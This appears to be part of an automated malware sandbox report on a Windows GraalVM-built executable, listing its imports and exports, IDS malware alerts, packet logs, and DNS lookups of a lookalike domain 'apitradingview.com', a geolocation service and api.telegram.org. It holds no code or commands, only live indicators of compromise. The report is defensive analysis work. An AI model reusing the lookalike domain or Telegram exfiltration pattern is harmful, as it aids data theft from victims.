                                                          .svm_hea0x72f0000x6f00000x6f000007179480af9ebc41b24e52a193fa769cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .reloc0xe1f0000xa1300xb0003ceee33c6dea8e5bfca1fef965bf1e93False0.11656605113636363data5.319384389908146IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Imports

                                                          DLLImport
                                                          VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                          ADVAPI32.dllRegCloseKey, RegEnumKeyExA, GetUserNameW, OpenProcessToken, RegOpenKeyExA, RegOpenKeyExW, RegQueryInfoKeyA, RegQueryValueExA, RegQueryValueExW
                                                          WS2_32.dllclosesocket, getaddrinfo, freeaddrinfo, socket, ntohl, WSAStartup, gethostname
                                                          USERENV.dllGetUserProfileDirectoryW
                                                          KERNEL32.dllWaitForSingleObject, WakeAllConditionVariable, WriteFile, GetTimeZoneInformation, GetDynamicTimeZoneInformation, MultiByteToWideChar, GetLocaleInfoA, GetGeoInfoA, GetUserGeoID, GetUserDefaultLCID, SetLastError, SetHandleInformation, GetFileSizeEx, ReadFile, SetFilePointerEx, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, GetFileAttributesW, GetFileAttributesExW, GetFileInformationByHandle, GetFullPathNameW, GlobalMemoryStatusEx, DeviceIoControl, FormatMessageW, VirtualQuery, GetEnvironmentStrings, GetEnvironmentStringsW, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WaitForMultipleObjects, GetProcessTimes, GetCurrentProcessId, TerminateProcess, GetExitCodeProcess, OpenProcess, GetHandleInformation, CreatePipe, CreateProcessW, GetProcessId, WideCharToMultiByte, GetConsoleWindow, GetFileType, PeekNamedPipe, GetNumberOfConsoleInputEvents, PeekConsoleInputA, GetSystemTimeAsFileTime, GetProcessAffinityMask, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, InitializeSListHead, IsDebuggerPresent, GetModuleHandleW, GetWindowsDirectoryW, GetVersionExA, GetTempPathW, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameW, GetLastError, GetCurrentThreadId, GetCurrentThread, VirtualProtect, VirtualFree, VirtualAlloc, UnmapViewOfFile, SwitchToThread, SleepConditionVariableCS, Sleep, SetEvent, ResetEvent, QueryPerformanceFrequency, QueryPerformanceCounter, GetCurrentProcess, GetCurrentDirectoryW, FlushFileBuffers, EnterCriticalSection, DuplicateHandle, CreateFileW, CreateFileMappingW, CreateEventA, CloseHandle, AddVectoredContinueHandler, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GetModuleHandleExW, InitializeConditionVariable
                                                          VCRUNTIME140.dllmemcpy, __current_exception, wcschr, __C_specific_handler, memset, __current_exception_context
                                                          api-ms-win-crt-runtime-l1-1-0.dll_exit, _set_app_type, exit, terminate, _register_onexit_function, _initialize_onexit_table, _seh_filter_exe, _errno, _register_thread_local_exe_atexit_callback, _c_exit, _cexit, __p___argv, __p___argc, _initterm_e, _initterm, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _beginthreadex, _crt_atexit
                                                          api-ms-win-crt-string-l1-1-0.dllstrcmp, wcscpy, isdigit, wcscmp, iswctype, strcpy, _strdup, wcsncat, towupper, wcsncmp, wcslen, _wcsupr, strlen, wcscat
                                                          api-ms-win-crt-environment-l1-1-0.dll_wgetdcwd, _wgetenv, _wgetcwd
                                                          api-ms-win-crt-heap-l1-1-0.dllmalloc, free, _set_new_mode, calloc
                                                          api-ms-win-crt-convert-l1-1-0.dllwcstombs, strtoull
                                                          api-ms-win-crt-stdio-l1-1-0.dll_set_fmode, __acrt_iob_func, __stdio_common_vfprintf, __stdio_common_vsprintf, fputs, __stdio_common_vswprintf, __p__commode
                                                          api-ms-win-crt-filesystem-l1-1-0.dll_wfullpath
                                                          api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                          api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                          IPHLPAPI.DLLConvertLengthToIpv4Mask, ConvertInterfaceLuidToNameW, ConvertInterfaceNameToLuidW, GetIfEntry2, GetUnicastIpAddressTable, GetAnycastIpAddressTable, FreeMibTable

                                                          Exports

                                                          NameOrdinalAddress
                                                          IsolateEnterStub__CEntryPointNativeFunctions__attachThread__LWiahz8fydJWgxqffuaEC210x140031510
                                                          IsolateEnterStub__CEntryPointNativeFunctions__createIsolate__aVxZJEvxfd8FslyQXMlHNI20x1400316d0
                                                          IsolateEnterStub__CEntryPointNativeFunctions__detachAllThreadsAndTearDownIsolate__OPBluFOA7k6a9G1cqb6TTL30x1400319d0
                                                          IsolateEnterStub__CEntryPointNativeFunctions__detachThread__vZogK8TBGAIeNIWWaZu2QH40x140031c20
                                                          IsolateEnterStub__CEntryPointNativeFunctions__getCurrentThread__p19YkdKU3I3cgUmQuiiTd050x140031e90
                                                          IsolateEnterStub__CEntryPointNativeFunctions__getIsolate__4JMPcmfHydBLuvj7ff2do860x140032060
                                                          IsolateEnterStub__CEntryPointNativeFunctions__tearDownIsolate__I3DVyDKs6z4vL79kJC9BEE70x140032090
                                                          IsolateEnterStub__JNIInvocationInterface_0024Exports__JNI__CreateJavaVM__zfv8XhXAFhERNPUoh38uvF80x140051710
                                                          IsolateEnterStub__JNIInvocationInterface_0024Exports__JNI__GetCreatedJavaVMs__jTTCq2UmbC48XDHPdLhle590x140052530
                                                          IsolateEnterStub__JNIInvocationInterface_0024Exports__JNI__GetDefaultJavaVMInitArgs__8P9gtUmW2O2BqcAmkyOH99100x140030880
                                                          IsolateEnterStub__JavaMainWrapper__run__cXbfAhOWcF90761nQYco7L110x140053b30
                                                          JNI_CreateJavaVM120x140051710
                                                          JNI_GetCreatedJavaVMs130x140052530
                                                          JNI_GetDefaultJavaVMInitArgs140x140030880
                                                          __svm_code_section150x140001000
                                                          __svm_version_info160x1407209b8
                                                          __svm_vm_java_version170x140720928
                                                          __svm_vm_target_ccompiler180x140720aa0
                                                          __svm_vm_target_libc190x140720ae8
                                                          __svm_vm_target_libraries200x140720988
                                                          __svm_vm_target_platform210x140720c20
                                                          __svm_vm_target_staticlibraries220x140720d50
                                                          graal_attach_thread230x140031510
                                                          graal_create_isolate240x1400316d0
                                                          graal_detach_all_threads_and_tear_down_isolate250x1400319d0
                                                          graal_detach_thread260x140031c20
                                                          graal_get_current_thread270x140031e90
                                                          graal_get_isolate280x140032060
                                                          graal_tear_down_isolate290x140032090
                                                          main300x140053b30

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-11-04T09:38:56.060215+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.114973386.104.15.60443TCP
                                                          2024-11-04T09:39:04.720276+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.1149774TCP
                                                          2024-11-04T09:39:43.048659+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.1149981TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 4, 2024 09:38:52.058588028 CET49717443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:52.058629990 CET4434971786.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:52.058706999 CET49717443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:52.103962898 CET49717443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:52.103993893 CET4434971786.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:53.041007042 CET4434971786.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:53.041188955 CET49717443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:53.045886993 CET49717443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:53.045912027 CET4434971786.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:53.046297073 CET4434971786.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:53.053602934 CET49717443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:53.095339060 CET4434971786.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:53.333097935 CET4434971786.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:53.333244085 CET4434971786.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:53.333292961 CET49717443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:53.333298922 CET4434971786.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:53.333343029 CET49717443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:53.366606951 CET49717443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:54.877948046 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:54.877964973 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:54.878037930 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:54.878395081 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:54.878407001 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:55.783615112 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:55.785598993 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:55.785629988 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.060256958 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.104608059 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.104628086 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.157793999 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.207263947 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.207279921 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.207328081 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.207348108 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.207361937 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.207361937 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.207375050 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.207386017 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.207390070 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.207418919 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.326214075 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.326230049 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.326257944 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.326294899 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.326304913 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.326327085 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.326344967 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.458205938 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.458233118 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.458275080 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.458287001 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.458312035 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.458331108 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.564730883 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.564755917 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.564805984 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.564829111 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.564846992 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.564873934 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.683495998 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.683526039 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.684026957 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.684056044 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.684143066 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.802212000 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.802236080 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.802609921 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.802638054 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.802742958 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.921842098 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.921868086 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.923547983 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:56.923583031 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:56.923738956 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.008027077 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.008047104 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.008398056 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.008414030 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.008507013 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.041703939 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.041728973 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.041805983 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.041805983 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.041820049 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.042048931 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.160518885 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.160542965 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.160649061 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.160649061 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.160665989 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.160991907 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.278482914 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.278505087 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.278554916 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.278587103 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.278613091 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.278959990 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.397012949 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.397034883 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.397098064 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.397126913 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.397140980 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.397248030 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.398329020 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.398344994 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.398428917 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.398436069 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.398525953 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.534781933 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.534840107 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.534881115 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.534881115 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.534898996 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.535439968 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.537465096 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.537636042 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.638736010 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.638760090 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.638822079 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.638851881 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.638864994 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.638890028 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.643325090 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.643383980 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.643387079 CET4434973386.104.15.60192.168.2.11
                                                          Nov 4, 2024 09:38:57.643446922 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:57.653733969 CET49733443192.168.2.1186.104.15.60
                                                          Nov 4, 2024 09:38:58.647664070 CET49754443192.168.2.11172.67.70.233
                                                          Nov 4, 2024 09:38:58.647706985 CET44349754172.67.70.233192.168.2.11
                                                          Nov 4, 2024 09:38:58.647800922 CET49754443192.168.2.11172.67.70.233
                                                          Nov 4, 2024 09:38:58.652493954 CET49754443192.168.2.11172.67.70.233
                                                          Nov 4, 2024 09:38:58.652518034 CET44349754172.67.70.233192.168.2.11
                                                          Nov 4, 2024 09:38:59.262613058 CET44349754172.67.70.233192.168.2.11
                                                          Nov 4, 2024 09:38:59.262703896 CET49754443192.168.2.11172.67.70.233
                                                          Nov 4, 2024 09:38:59.264421940 CET49754443192.168.2.11172.67.70.233
                                                          Nov 4, 2024 09:38:59.264429092 CET44349754172.67.70.233192.168.2.11
                                                          Nov 4, 2024 09:38:59.264678001 CET44349754172.67.70.233192.168.2.11
                                                          Nov 4, 2024 09:38:59.314016104 CET49754443192.168.2.11172.67.70.233
                                                          Nov 4, 2024 09:38:59.314522028 CET49754443192.168.2.11172.67.70.233
                                                          Nov 4, 2024 09:38:59.355334044 CET44349754172.67.70.233192.168.2.11
                                                          Nov 4, 2024 09:38:59.480623007 CET44349754172.67.70.233192.168.2.11
                                                          Nov 4, 2024 09:38:59.480833054 CET44349754172.67.70.233192.168.2.11
                                                          Nov 4, 2024 09:38:59.480931044 CET49754443192.168.2.11172.67.70.233
                                                          Nov 4, 2024 09:38:59.482340097 CET49754443192.168.2.11172.67.70.233
                                                          Nov 4, 2024 09:39:05.267604113 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:05.267651081 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:05.267740011 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:05.268280983 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:05.268295050 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.120496988 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.120573044 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.123728037 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.123744011 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.124038935 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.133085012 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.179331064 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.368716955 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.369942904 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.369983912 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.370112896 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370135069 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.370248079 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370290995 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.370404959 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370424986 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.370441914 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370455980 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.370528936 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370558977 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.370590925 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370611906 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.370670080 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370682001 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.370701075 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370711088 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.370733976 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370786905 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370810032 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370887995 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370914936 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370923996 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370950937 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370973110 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.371011972 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380251884 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.380348921 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380369902 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.380623102 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380637884 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.380696058 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380705118 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.380723000 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380728960 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.380742073 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380762100 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380902052 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380924940 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380969048 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380987883 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.381009102 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.381095886 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.381150961 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385263920 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385432005 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385454893 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385459900 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385468960 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385540009 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385622025 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385632992 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385653973 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385659933 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385682106 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385687113 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385716915 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385745049 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385754108 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385773897 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385785103 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385848045 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385920048 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385945082 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.386017084 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.386024952 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.386046886 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.386064053 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.386076927 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.390645027 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:07.330739975 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:07.342972040 CET49795443192.168.2.11149.154.167.220

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 4, 2024 09:38:51.096915960 CET4953753192.168.2.111.1.1.1
                                                          Nov 4, 2024 09:38:52.041392088 CET53495371.1.1.1192.168.2.11
                                                          Nov 4, 2024 09:38:58.630949974 CET5469853192.168.2.111.1.1.1
                                                          Nov 4, 2024 09:38:58.641133070 CET53546981.1.1.1192.168.2.11
                                                          Nov 4, 2024 09:39:05.259938955 CET6136853192.168.2.111.1.1.1
                                                          Nov 4, 2024 09:39:05.266911983 CET53613681.1.1.1192.168.2.11
                                                          Nov 4, 2024 09:39:17.769067049 CET5794253192.168.2.111.1.1.1
                                                          Nov 4, 2024 09:39:17.775837898 CET53579421.1.1.1192.168.2.11

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Nov 4, 2024 09:38:51.096915960 CET192.168.2.111.1.1.10xcebeStandard query (0)apitradingview.comA (IP address)IN (0x0001)false
                                                          Nov 4, 2024 09:38:58.630949974 CET192.168.2.111.1.1.10x425fStandard query (0)get.geojs.ioA (IP address)IN (0x0001)false
                                                          Nov 4, 2024 09:39:05.259938955 CET192.168.2.111.1.1.10x3c72Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                          Nov 4, 2024 09:39:17.769067049 CET192.168.2.111.1.1.10x650cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Nov 4, 2024 09:38:52.041392088 CET1.1.1.1192.168.2.110xcebeNo error (0)apitradingview.com86.104.15.60A (IP address)IN (0x0001)false
                                                          Nov 4, 2024 09:38:58.641133070 CET1.1.1.1192.168.2.110x425fNo error (0)get.geojs.io172.67.70.233A (IP address)IN (0x0001)false
                                                          Nov 4, 2024 09:38:58.641133070 CET1.1.1.1192.168.2.110x425fNo error (0)get.geojs.io104.26.1.100A (IP address)IN (0x0001)false
                                                          Nov 4, 2024 09:38:58.641133070 CET1.1.1.1192.168.2.110x425fNo error (0)get.geojs.io104.26.0.100A (IP address)IN (0x0001)false
